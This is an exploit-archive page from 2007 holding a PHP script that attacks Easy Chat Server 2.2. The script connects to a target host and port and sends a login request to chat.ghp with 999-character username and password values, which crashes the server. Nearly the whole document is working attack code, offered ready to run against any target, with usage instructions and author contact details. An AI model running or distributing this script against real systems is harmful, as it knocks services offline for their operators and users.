Home / exploits ecs-dos.txt
Posted on 15 August 2007
<?php ########################################################## ###----------------------------------------------------### ###--------Easy Chat Server Remote DoS Exploit---------### ###----------------------------------------------------### ###-http://www.echatserver.com/------------------------### ###----------------------------------------------------### ###-Tested on version 2.2 [last version]-(XP SP2)------### ###----------------------------------------------------### ###-Usage:-php dos.php [TARGET] [PORT]-----------------### ###----------------------------------------------------### ###-Author:--NetJackal---------------------------------### ###-Email:---nima_501[at]yahoo[dot]com-----------------### ###-Website:-http://netjackal.by.ru--------------------### ###----------------------------------------------------### ########################################################## /* Description: Easy Chat Server has built-in web server let users login to chat server. Login page allow Max 30 characters length for Name & Password. If attacker inserts a long Name & Password by editing or make his own login page, chat server will crash. */ echo "Easy Chat Server Remote DoS Exploit by NetJackal"; if($argc<2)die(" Usage: php dos.php [TARGET] [PORT] Example: php dos.php localhost 80 "); $host=$argv[1]; $port=$argv[2]; $A=str_repeat('A',999); echo " Connecting..."; $link=fsockopen($host,$port,$en,$es,30); if(!$link)die(" $en: $es"); echo " Connected!"; echo " Sending exploit..."; fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1 Host: $host "); echo " Well done! "; ?>
